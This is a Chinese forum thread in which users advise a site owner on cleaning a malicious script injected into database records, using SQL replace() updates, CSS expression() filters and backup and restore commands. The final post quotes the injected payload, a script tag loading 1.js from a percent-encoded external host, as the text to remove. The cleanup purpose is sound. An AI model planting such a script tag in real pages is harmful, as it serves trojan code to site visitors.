调试易

完全 可以通过 replace 替换掉， 修改密码不管用，关键是第一次黑客怎么进去的 ？

update tablename set colname=replace(colname,'加入的字符串','')

LZ的被入侵，是属于被脚本恶意入侵。1.先确定你的服务器有没有中病毒
2.检查恶意脚本在你页面启作用的地方，然后查看你的对应处理代码
3.对文章中的脚本进行过滤。之前在蓝色理想看到的．在CSS里面定义iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}原理：将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完，只有部分被强制缓存输出了，剩下的不会再写了。 

最简单的拉create database mydbGouse mydb create table test
(
pkid int
)insert into test select 1  union select 2backup database mydb to disk='c:\abc.bak'drop database mydbGo开始恢复:create database mydb
gorestore database mydb from disk='c:\abc.bak' with replace数据库我也不是很熟悉。所以。

用了3楼朋友的方法
update tablename set colname=replace(colname,'</title></pre>><script</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!','')
成功执行了，可是没有效果，郁闷了！